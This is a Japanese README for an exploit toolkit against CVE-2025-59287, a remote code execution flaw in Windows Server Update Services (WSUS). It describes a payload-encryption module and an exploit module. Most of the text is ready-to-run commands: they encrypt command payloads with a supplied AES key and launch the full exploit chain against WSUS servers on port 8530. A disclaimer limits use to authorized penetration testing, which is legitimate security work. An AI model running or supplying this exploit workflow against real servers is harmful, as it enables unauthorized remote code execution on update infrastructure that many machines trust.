
CVE-2025-59287(WSUS RCE脆弱性)向けのエクスプロイトツールキット。AESペイロード暗号化と、許可されたペネトレーションテスト向けの完全なエクスプロイトチェーンを備えています。
CVE-2025-59287 - WSUSエクスプロイトツールキット
作者: adel-h4x0a
⚠️ 教育および許可されたテスト目的のみ ⚠️
概要
このツールキットは、Windows Server Update Services (WSUS) のリモートコード実行脆弱性であるCVE-2025-59287の悪用を実演します。
コンポーネント
· WSUS通信のためのAESペイロード暗号化 · レガシーおよびセキュア暗号化モードの両方をサポート · カスタムペイロード生成
· CVE-2025-59287の完全な悪用チェーン · 堅牢なエラーハンドリングとリトライロジック · カスタムペイロードのサポート
構造
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
使用方法
前提条件
pip install -r requirements.txt
暗号化
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
悪用
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
オプション
暗号化モジュール (cve-2025-59287-encr.py)
· --key: 16進数形式のAESキー(オプション)
· --command: 実行するコマンド(デフォルト: calc)
· --mode: 暗号化モード [legacy, secure](デフォルト: legacy)
· --output: ペイロードを保存する出力ファイル(オプション)
悪用モジュール (cve-2025-59287-exp.py)
· target: WSUSサーバーのURL(必須) · --payload: カスタムbase64ペイロードファイル(オプション) · --timeout: リクエストのタイムアウト(秒)(デフォルト: 30) · --retries: リトライ回数(デフォルト: 3) · --no-banner: バナー表示を抑制(オプション)
完全な例
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
法的免責事項
❗ 重要な警告:
このツールは教育目的および許可されたペネトレーションテストのために提供されています。所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。
このツールは以下の環境でのみ使用すべきです:
· 自分が所有するテスト環境 · テストのための書面による許可を得たシステム · 教育および学術目的
開発者は、本ツールの違法または不正使用について一切の責任を負いません。
ライセンス
このプロジェクトはMITライセンスの下でライセンスされています。
更新履歴
· v1.0: 完全な悪用サポートを備えた初期リリース · v1.1: エラーハンドリングの強化とログの改善
貢献
責任ある倫理的な使用の枠組みの中でツールを改善するために、バグ報告やプルリクエストを歓迎します。
注:システムをテストする前には常に書面による許可を得てください。セキュリティ意識は責任から始まります。🔒